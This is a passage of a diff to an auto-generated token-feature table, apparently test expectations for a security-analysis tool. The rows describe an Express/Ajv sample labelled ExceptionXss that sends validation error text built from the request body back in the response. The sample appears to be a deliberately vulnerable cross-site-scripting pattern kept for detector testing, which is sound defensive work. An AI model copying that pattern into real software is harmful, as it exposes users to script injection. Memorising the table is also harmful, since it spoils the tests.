autogenerated/Xss/ExceptionXss/ajv.js:2:8:2:10 | Ajv | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:2:8:2:10 | Ajv | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:2:8:2:10 | Ajv | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:2:8:2:10 | Ajv | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:2:8:2:10 | Ajv | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:2:8:2:10 | Ajv | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:2:8:2:10 | Ajv | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:2:8:2:10 | Ajv | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:2:8:2:10 | Ajv | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:2:17:2:21 | 'ajv' | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:2:17:2:21 | 'ajv' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:2:17:2:21 | 'ajv' | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:4:5:4:7 | app | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:4:5:4:7 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:4:5:4:7 | app | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:4:5:4:19 | app | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:4:5:4:19 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:4:5:4:19 | app | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:4:5:4:19 | app = express() | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:4:5:4:19 | app = express() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:4:5:4:19 | app = express() | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:4:11:4:17 | express | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:4:11:4:17 | express | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:4:11:4:17 | express | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:4:11:4:19 | exceptional return of express() | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:4:11:4:19 | exceptional return of express() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:4:11:4:19 | exceptional return of express() | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:4:11:4:19 | express() | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:4:11:4:19 | express() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:4:11:4:19 | express() | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:5:5:5:7 | ajv | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:5:5:5:7 | ajv | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:5:5:5:7 | ajv | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:5:5:5:7 | ajv | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:5:5:5:19 | ajv | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:5:5:5:19 | ajv | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:5:5:5:19 | ajv | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:5:5:5:19 | ajv = new Ajv() | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:5:5:5:19 | ajv = new Ajv() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:5:5:5:19 | ajv = new Ajv() | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:5:11:5:19 | exceptional return of new Ajv() | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:5:11:5:19 | exceptional return of new Ajv() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:5:11:5:19 | exceptional return of new Ajv() | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:5:11:5:19 | new Ajv() | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:5:11:5:19 | new Ajv() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:5:11:5:19 | new Ajv() | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:5:15:5:17 | Ajv | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:5:15:5:17 | Ajv | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:5:15:5:17 | Ajv | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:7:1:7:3 | ajv | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:7:1:7:3 | ajv | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:7:1:7:3 | ajv | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:7:1:7:13 | ajv.addSchema | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:7:1:7:13 | ajv.addSchema | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:7:1:7:13 | ajv.addSchema | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:7:1:7:83 | ajv.add ... lData') | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:7:1:7:83 | ajv.add ... lData') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:7:1:7:83 | ajv.add ... lData') | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:7:1:7:83 | exceptional return of ajv.add ... lData') | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:7:1:7:83 | exceptional return of ajv.add ... lData') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:7:1:7:83 | exceptional return of ajv.add ... lData') | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:7:5:7:13 | addSchema | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:7:5:7:13 | addSchema | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:7:5:7:13 | addSchema | fileImports | ajv express joi | | autogenerated/Xss/ExceptionXss/ajv.js:7:15:7:70 | {type: ... mber'}} | CalleeFlexibleAccessPath | ajv.addSchema | | autogenerated/Xss/ExceptionXss/ajv.js:7:15:7:70 | {type: ... mber'}} | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/ajv.js:7:15:7:70 | {type: ... mber'}} | calleeImports | ajv | @@ -18668,6 +127072,15 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/ajv.js:7:15:7:70 | {type: ... mber'}} | contextSurroundingFunctionParameters | | | autogenerated/Xss/ExceptionXss/ajv.js:7:15:7:70 | {type: ... mber'}} | fileImports | ajv express joi | | autogenerated/Xss/ExceptionXss/ajv.js:7:15:7:70 | {type: ... mber'}} | receiverName | ajv | +| autogenerated/Xss/ExceptionXss/ajv.js:7:16:7:19 | type | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:7:16:7:19 | type | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:7:16:7:19 | type | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:7:16:7:29 | type: 'object' | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:7:16:7:29 | type: 'object' | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:7:16:7:29 | type: 'object' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:7:16:7:29 | type: 'object' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:7:16:7:29 | type: 'object' | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:7:16:7:29 | type: 'object' | fileImports | ajv express joi | | autogenerated/Xss/ExceptionXss/ajv.js:7:22:7:29 | 'object' | CalleeFlexibleAccessPath | ajv.addSchema | | autogenerated/Xss/ExceptionXss/ajv.js:7:22:7:29 | 'object' | InputAccessPathFromCallee | 0.type | | autogenerated/Xss/ExceptionXss/ajv.js:7:22:7:29 | 'object' | InputArgumentIndex | 0 | @@ -18676,6 +127089,15 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/ajv.js:7:22:7:29 | 'object' | contextFunctionInterfaces | | | autogenerated/Xss/ExceptionXss/ajv.js:7:22:7:29 | 'object' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ExceptionXss/ajv.js:7:22:7:29 | 'object' | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:7:32:7:51 | additionalProperties | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:7:32:7:51 | additionalProperties | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:7:32:7:51 | additionalProperties | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:7:32:7:69 | additio ... umber'} | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:7:32:7:69 | additio ... umber'} | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:7:32:7:69 | additio ... umber'} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:7:32:7:69 | additio ... umber'} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:7:32:7:69 | additio ... umber'} | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:7:32:7:69 | additio ... umber'} | fileImports | ajv express joi | | autogenerated/Xss/ExceptionXss/ajv.js:7:54:7:69 | {type: 'number'} | CalleeFlexibleAccessPath | ajv.addSchema | | autogenerated/Xss/ExceptionXss/ajv.js:7:54:7:69 | {type: 'number'} | InputAccessPathFromCallee | 0.additionalProperties | | autogenerated/Xss/ExceptionXss/ajv.js:7:54:7:69 | {type: 'number'} | InputArgumentIndex | 0 | @@ -18684,6 +127106,15 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/ajv.js:7:54:7:69 | {type: 'number'} | contextFunctionInterfaces | | | autogenerated/Xss/ExceptionXss/ajv.js:7:54:7:69 | {type: 'number'} | contextSurroundingFunctionParameters | | | autogenerated/Xss/ExceptionXss/ajv.js:7:54:7:69 | {type: 'number'} | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:7:55:7:58 | type | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:7:55:7:58 | type | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:7:55:7:58 | type | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:7:55:7:68 | type: 'number' | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:7:55:7:68 | type: 'number' | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:7:55:7:68 | type: 'number' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:7:55:7:68 | type: 'number' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:7:55:7:68 | type: 'number' | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:7:55:7:68 | type: 'number' | fileImports | ajv express joi | | autogenerated/Xss/ExceptionXss/ajv.js:7:61:7:68 | 'number' | CalleeFlexibleAccessPath | ajv.addSchema | | autogenerated/Xss/ExceptionXss/ajv.js:7:61:7:68 | 'number' | InputAccessPathFromCallee | 0.additionalProperties.type | | autogenerated/Xss/ExceptionXss/ajv.js:7:61:7:68 | 'number' | InputArgumentIndex | 0 | @@ -18699,6 +127130,21 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/ajv.js:7:73:7:82 | 'pollData' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ExceptionXss/ajv.js:7:73:7:82 | 'pollData' | fileImports | ajv express joi | | autogenerated/Xss/ExceptionXss/ajv.js:7:73:7:82 | 'pollData' | receiverName | ajv | +| autogenerated/Xss/ExceptionXss/ajv.js:9:1:9:3 | app | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:9:1:9:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:9:1:9:3 | app | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:9:1:9:8 | app.post | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:9:1:9:8 | app.post | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:9:1:9:8 | app.post | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:9:1:13:2 | app.pos ... }\\n}) | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:9:1:13:2 | app.pos ... }\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:9:1:13:2 | app.pos ... }\\n}) | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:9:1:13:2 | exceptional return of app.pos ... }\\n}) | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:9:1:13:2 | exceptional return of app.pos ... }\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:9:1:13:2 | exceptional return of app.pos ... }\\n}) | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:9:5:9:8 | post | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:9:5:9:8 | post | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:9:5:9:8 | post | fileImports | ajv express joi | | autogenerated/Xss/ExceptionXss/ajv.js:9:10:9:20 | '/polldata' | CalleeFlexibleAccessPath | app.post | | autogenerated/Xss/ExceptionXss/ajv.js:9:10:9:20 | '/polldata' | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/ajv.js:9:10:9:20 | '/polldata' | calleeImports | express | @@ -18706,6 +127152,16 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/ajv.js:9:10:9:20 | '/polldata' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ExceptionXss/ajv.js:9:10:9:20 | '/polldata' | fileImports | ajv express joi | | autogenerated/Xss/ExceptionXss/ajv.js:9:10:9:20 | '/polldata' | receiverName | app | +| autogenerated/Xss/ExceptionXss/ajv.js:9:23:9:22 | ajv | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:9:23:9:22 | ajv | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:9:23:9:22 | ajv | enclosingFunctionBody | req res ajv validate pollData req body res send ajv errorsText | +| autogenerated/Xss/ExceptionXss/ajv.js:9:23:9:22 | ajv | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ExceptionXss/ajv.js:9:23:9:22 | ajv | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:9:23:13:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:9:23:13:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:9:23:13:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res ajv validate pollData req body res send ajv errorsText | +| autogenerated/Xss/ExceptionXss/ajv.js:9:23:13:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ExceptionXss/ajv.js:9:23:13:1 | 'arguments' object of anonymous function | fileImports | ajv express joi | | autogenerated/Xss/ExceptionXss/ajv.js:9:23:13:1 | (req, r ... }\\n} | CalleeFlexibleAccessPath | app.post | | autogenerated/Xss/ExceptionXss/ajv.js:9:23:13:1 | (req, r ... }\\n} | InputArgumentIndex | 1 | | autogenerated/Xss/ExceptionXss/ajv.js:9:23:13:1 | (req, r ... }\\n} | calleeImports | express | @@ -18713,6 +127169,111 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/ajv.js:9:23:13:1 | (req, r ... }\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/Xss/ExceptionXss/ajv.js:9:23:13:1 | (req, r ... }\\n} | fileImports | ajv express joi | | autogenerated/Xss/ExceptionXss/ajv.js:9:23:13:1 | (req, r ... }\\n} | receiverName | app | +| autogenerated/Xss/ExceptionXss/ajv.js:9:23:13:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:9:23:13:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:9:23:13:1 | exceptional return of anonymous function | enclosingFunctionBody | req res ajv validate pollData req body res send ajv errorsText | +| autogenerated/Xss/ExceptionXss/ajv.js:9:23:13:1 | exceptional return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ExceptionXss/ajv.js:9:23:13:1 | exceptional return of anonymous function | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:9:23:13:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:9:23:13:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:9:23:13:1 | return of anonymous function | enclosingFunctionBody | req res ajv validate pollData req body res send ajv errorsText | +| autogenerated/Xss/ExceptionXss/ajv.js:9:23:13:1 | return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ExceptionXss/ajv.js:9:23:13:1 | return of anonymous function | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:9:24:9:26 | req | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:9:24:9:26 | req | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:9:24:9:26 | req | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:9:24:9:26 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/ajv.js:9:24:9:26 | req | enclosingFunctionBody | req res ajv validate pollData req body res send ajv errorsText | +| autogenerated/Xss/ExceptionXss/ajv.js:9:24:9:26 | req | enclosingFunctionBody | req res ajv validate pollData req body res send ajv errorsText | +| autogenerated/Xss/ExceptionXss/ajv.js:9:24:9:26 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ExceptionXss/ajv.js:9:24:9:26 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ExceptionXss/ajv.js:9:24:9:26 | req | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:9:24:9:26 | req | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:9:29:9:31 | res | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:9:29:9:31 | res | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:9:29:9:31 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:9:29:9:31 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/ajv.js:9:29:9:31 | res | enclosingFunctionBody | req res ajv validate pollData req body res send ajv errorsText | +| autogenerated/Xss/ExceptionXss/ajv.js:9:29:9:31 | res | enclosingFunctionBody | req res ajv validate pollData req body res send ajv errorsText | +| autogenerated/Xss/ExceptionXss/ajv.js:9:29:9:31 | res | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ExceptionXss/ajv.js:9:29:9:31 | res | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ExceptionXss/ajv.js:9:29:9:31 | res | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:9:29:9:31 | res | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:10:9:10:43 | !ajv.va ... q.body) | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:10:9:10:43 | !ajv.va ... q.body) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/ajv.js:10:9:10:43 | !ajv.va ... q.body) | enclosingFunctionBody | req res ajv validate pollData req body res send ajv errorsText | +| autogenerated/Xss/ExceptionXss/ajv.js:10:9:10:43 | !ajv.va ... q.body) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ExceptionXss/ajv.js:10:9:10:43 | !ajv.va ... q.body) | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:10:10:10:12 | ajv | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:10:10:10:12 | ajv | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/ajv.js:10:10:10:12 | ajv | enclosingFunctionBody | req res ajv validate pollData req body res send ajv errorsText | +| autogenerated/Xss/ExceptionXss/ajv.js:10:10:10:12 | ajv | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ExceptionXss/ajv.js:10:10:10:12 | ajv | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:10:10:10:21 | ajv.validate | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:10:10:10:21 | ajv.validate | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/ajv.js:10:10:10:21 | ajv.validate | enclosingFunctionBody | req res ajv validate pollData req body res send ajv errorsText | +| autogenerated/Xss/ExceptionXss/ajv.js:10:10:10:21 | ajv.validate | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ExceptionXss/ajv.js:10:10:10:21 | ajv.validate | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:10:10:10:43 | ajv.val ... q.body) | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:10:10:10:43 | ajv.val ... q.body) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/ajv.js:10:10:10:43 | ajv.val ... q.body) | enclosingFunctionBody | req res ajv validate pollData req body res send ajv errorsText | +| autogenerated/Xss/ExceptionXss/ajv.js:10:10:10:43 | ajv.val ... q.body) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ExceptionXss/ajv.js:10:10:10:43 | ajv.val ... q.body) | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:10:10:10:43 | exceptional return of ajv.val ... q.body) | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:10:10:10:43 | exceptional return of ajv.val ... q.body) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:10:10:10:43 | exceptional return of ajv.val ... q.body) | enclosingFunctionBody | req res ajv validate pollData req body res send ajv errorsText | +| autogenerated/Xss/ExceptionXss/ajv.js:10:10:10:43 | exceptional return of ajv.val ... q.body) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ExceptionXss/ajv.js:10:10:10:43 | exceptional return of ajv.val ... q.body) | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:10:14:10:21 | validate | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:10:14:10:21 | validate | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/ajv.js:10:14:10:21 | validate | enclosingFunctionBody | req res ajv validate pollData req body res send ajv errorsText | +| autogenerated/Xss/ExceptionXss/ajv.js:10:14:10:21 | validate | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ExceptionXss/ajv.js:10:14:10:21 | validate | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:10:35:10:37 | req | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:10:35:10:37 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/ajv.js:10:35:10:37 | req | enclosingFunctionBody | req res ajv validate pollData req body res send ajv errorsText | +| autogenerated/Xss/ExceptionXss/ajv.js:10:35:10:37 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ExceptionXss/ajv.js:10:35:10:37 | req | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:10:39:10:42 | body | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:10:39:10:42 | body | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/ajv.js:10:39:10:42 | body | enclosingFunctionBody | req res ajv validate pollData req body res send ajv errorsText | +| autogenerated/Xss/ExceptionXss/ajv.js:10:39:10:42 | body | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ExceptionXss/ajv.js:10:39:10:42 | body | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:11:9:11:11 | res | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:11:9:11:11 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/ajv.js:11:9:11:11 | res | enclosingFunctionBody | req res ajv validate pollData req body res send ajv errorsText | +| autogenerated/Xss/ExceptionXss/ajv.js:11:9:11:11 | res | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ExceptionXss/ajv.js:11:9:11:11 | res | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:11:9:11:16 | res.send | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:11:9:11:16 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/ajv.js:11:9:11:16 | res.send | enclosingFunctionBody | req res ajv validate pollData req body res send ajv errorsText | +| autogenerated/Xss/ExceptionXss/ajv.js:11:9:11:16 | res.send | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ExceptionXss/ajv.js:11:9:11:16 | res.send | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:11:9:11:34 | exceptional return of res.sen ... Text()) | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:11:9:11:34 | exceptional return of res.sen ... Text()) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:11:9:11:34 | exceptional return of res.sen ... Text()) | enclosingFunctionBody | req res ajv validate pollData req body res send ajv errorsText | +| autogenerated/Xss/ExceptionXss/ajv.js:11:9:11:34 | exceptional return of res.sen ... Text()) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ExceptionXss/ajv.js:11:9:11:34 | exceptional return of res.sen ... Text()) | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:11:9:11:34 | res.sen ... Text()) | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:11:9:11:34 | res.sen ... Text()) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/ajv.js:11:9:11:34 | res.sen ... Text()) | enclosingFunctionBody | req res ajv validate pollData req body res send ajv errorsText | +| autogenerated/Xss/ExceptionXss/ajv.js:11:9:11:34 | res.sen ... Text()) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ExceptionXss/ajv.js:11:9:11:34 | res.sen ... Text()) | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:11:13:11:16 | send | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:11:13:11:16 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/ajv.js:11:13:11:16 | send | enclosingFunctionBody | req res ajv validate pollData req body res send ajv errorsText | +| autogenerated/Xss/ExceptionXss/ajv.js:11:13:11:16 | send | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ExceptionXss/ajv.js:11:13:11:16 | send | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:11:18:11:20 | ajv | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:11:18:11:20 | ajv | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/ajv.js:11:18:11:20 | ajv | enclosingFunctionBody | req res ajv validate pollData req body res send ajv errorsText | +| autogenerated/Xss/ExceptionXss/ajv.js:11:18:11:20 | ajv | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ExceptionXss/ajv.js:11:18:11:20 | ajv | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:11:18:11:31 | ajv.errorsText | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:11:18:11:31 | ajv.errorsText | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/ajv.js:11:18:11:31 | ajv.errorsText | enclosingFunctionBody | req res ajv validate pollData req body res send ajv errorsText | +| 